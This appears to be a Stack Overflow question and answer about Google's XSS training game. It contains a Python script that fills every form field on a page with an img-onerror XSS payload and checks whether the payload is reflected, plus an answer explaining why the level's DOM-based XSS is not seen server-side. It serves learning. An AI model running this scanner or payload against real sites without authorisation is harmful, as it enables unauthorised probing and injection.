# How can I submit form (containing text areas and Input fields) python for XSS attack?

Tags: python, textarea, xss

I have been learning XSS and which solving google game built for XSS

http://www.xss-game.appspot.com/level2/frame

I was successful to find the solution of this level which is to wrap script in image tag but I am unable to find the vulnerability by using this python code below.

```
from bs4 import BeautifulSoup
from bs4.element import Script
from requests_html import HTMLSession
from urllib.parse import urljoin
from bs4 import BeautifulSoup

session = HTMLSession()

def retrieve_all_forms(url):
    r = session.get(url)
    soup = BeautifulSoup(r.html.html,"html.parser")
    return soup.find_all("form")


def retrieve_form_details(form):
    form_details = {}
    form_details["action"] = form.attrs.get("action").lower()
    form_details["request_method"] = form.attrs.get("method","get").lower()
    input_tags_info = []
    
    for itag in form.find_all("input"):
        type = itag.attrs.get("type", "text")
        name = itag.attrs.get("name")
        value = itag.attrs.get("value", "")
        input_tags_info.append({"type":type,"name":name,"value":value})
    for ttag in form.find_all("textarea"):
        name = ttag.attrs.get("name")
        value = ttag.attrs.get("value", "")
        type = ttag.attrs.get("type", "text")
        input_tags_info.append({"type":type,"name":name,"value":value})
    form_details["inputs"] = input_tags_info
    return form_details


def payload_insulation(form, payload):
    for itag in form["inputs"]:
        
        if itag["type"] !="hidden" and itag["type"] !="submit":
            print(itag)
            itag["value"] = payload
    #print(form["inputs"])
    return form

def submit_form(url,form,payload):
    data ={}
    #print(form["inputs"])
    for itag in form["inputs"]:
        data[itag["name"]] = itag["value"]
    print(data)
    if form["request_method"] == "post":
        res = session.post(url, data=data)
    elif form["request_method"] == "get":
        res = session.get(url, params=data)
    #print(res.text)
    if payload in res.text:
        return 1
    else:
        return 0


def form_xss(url,payload):
    forms = retrieve_all_forms(url)
    results = []
    i=1
    for form in forms:
        form_details =retrieve_form_details(form)
        form = payload_insulation(form_details,payload)
        if submit_form(url,form,payload) == 1:
            results.append((payload,True))
        #print("="*50, f"form #{i}", "="*50)
        #print(form_details)
    return results

    
print(form_xss("http://www.xss-game.appspot.com/level2/frame",'<img src=x onerror="alert(String.fromCharCode(88,83,83))"/>'))
```

I have been trying to send the data through post but the img tag does not appears in the response. Can anybody tell me what I am missing in this code? Thanks

Answer (score 1, accepted):

The posts are read from local storage using JavaScript as in the page source:

```
  function displayPosts() {
    var containerEl = document.getElementById("post-container");
    containerEl.innerHTML = "";

    var posts = DB.getPosts();
    for (var i=0; i<posts.length; i++) {
      var html = '<table class="message"> <tr> <td valign=top> '
        + '<img src="/static/level2_icon.png"> </td> <td valign=top '
        + ' class="message-container"> <div class="shim"></div>';

      html += '<b>You</b>';
      html += '<span class="date">' + new Date(posts[i].date) + '</span>';
      html += "<blockquote>" + posts[i].message + "</blockquote";
      html += "</td></tr></table>"
      containerEl.innerHTML += html; 
    }
  }
```

So it's a DOM-based XSS which won't contain the tags in the response as it needs JavaScript and local storage to run.

Comment: Correct me if I am wrong. When I wrote the <img src=x onerror="alert(1)"/> in the textarea of in the website and clicked the share status button it did put the above tag in the response in the blockquote tag and an alert box was popped too.

Comment: but when I send data using above python code the tag does not appears in the blockqoute tag. So this is my problem basically

Comment: @MalikAbdulaziz The share status button executes a JavaScript function to add the content to the local storage. It's not making a request to the server and getting a response. Everything is happening on the client. This is different from some XSS vulnerabilities that involve data reflected by the server.

Comment: To see the alert, you would need to execute the JavaScript code. Something like a headless browser in Python could do this.

Comment: Ok I will try that